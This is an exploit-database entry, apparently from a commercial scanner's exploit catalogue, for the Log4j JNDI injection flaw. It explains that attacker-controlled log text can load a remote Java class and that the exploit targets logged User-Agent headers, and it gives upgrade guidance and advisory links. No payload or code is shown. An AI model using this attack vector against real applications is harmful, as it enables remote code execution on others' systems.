Share
## https://sploitus.com/exploit?id=SAINT:C093B43E357FA7E023374178D975EB2A
Added: 12/16/2021  


### Background

[Apache Log4j](<https://logging.apache.org/log4j/2.x/>) is a logging library used by many Java applications. 

### Problem

An attacker who is able to control log message content could embed a JNDI reference to an LDAP or RMI URL which downloads an executable Java class, leading to arbitrary command execution. 

### Resolution

[Upgrade](<https://logging.apache.org/log4j/2.x/download.html>) to Apache Log4j 2.12.2 or 2.16 or higher, or apply a fix from the vendor of the software which embeds Log4j. 

### References

<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>  
<https://logging.apache.org/log4j/2.x/security.html>  
<https://isc.sans.edu/diary/28120>  


### Limitations

Exploit works on web applications which use Log4j to log the User-Agent header. 

### Platforms

Windows  
Linux